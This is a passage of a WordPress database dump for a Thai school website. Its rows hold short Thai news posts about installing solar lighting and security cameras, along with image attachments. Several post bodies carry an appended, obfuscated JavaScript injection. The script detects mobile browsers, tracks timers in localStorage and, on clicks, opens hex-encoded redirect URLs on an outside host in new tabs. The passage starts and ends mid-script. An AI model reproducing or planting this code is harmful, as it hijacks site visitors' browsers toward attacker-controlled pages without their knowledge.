|\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร31-67','','inherit','closed','closed','','379-revision-v1','','','2024-08-01 20:30:19','2024-08-01 13:30:19','',379,'http://pakhaeng.ssk.in.th/?p=381',0,'revision','',0),
(383,1,'2024-08-01 20:32:45','2024-08-01 13:32:45','<!-- wp:paragraph -->\n<p><strong> วันที่ 15 กุมภาพันธ์ 2567 นำโดยท่านผู้อำนวยการเสน่หา พลโสภา ได้ติดตามการติดตั้งอุปกรณ์ ให้แสงสว่างภายในโรงเรียน ไฟโซล่าเซลล์ และการติดตั้งกล้องวงจรปิดภายในโรงเรียน ตามโครงการพัฒนาระบบรักษาความปลอดภัยในสถานศึกษา</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":384,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-724x1024.png\" alt=\"\" class=\"wp-image-384\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร4-67','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a34-67','','','2024-08-01 20:32:48','2024-08-01 13:32:48','',0,'http://pakhaeng.ssk.in.th/?p=383',0,'post','',0),
(384,1,'2024-08-01 20:32:31','2024-08-01 13:32:31','','2','','inherit','','closed','','2','','','2024-08-01 20:32:31','2024-08-01 13:32:31','',383,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2.png',0,'attachment','image/png',0),
(385,1,'2024-08-01 20:32:45','2024-08-01 13:32:45','<!-- wp:paragraph -->\n<p><strong> วันที่ 15 กุมภาพันธ์ 2567 นำโดยท่านผู้อำนวยการเสน่หา พลโสภา ได้ติดตามการติดตั้งอุปกรณ์ ให้แสงสว่างภายในโรงเรียน ไฟโซล่าเซลล์ และการติดตั้งกล้องวงจรปิดภายในโรงเรียน ตามโครงการพัฒนาระบบรักษาความปลอดภัยในสถานศึกษา</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":384,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-724x1024.png\" alt=\"\" class=\"wp-image-384\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const 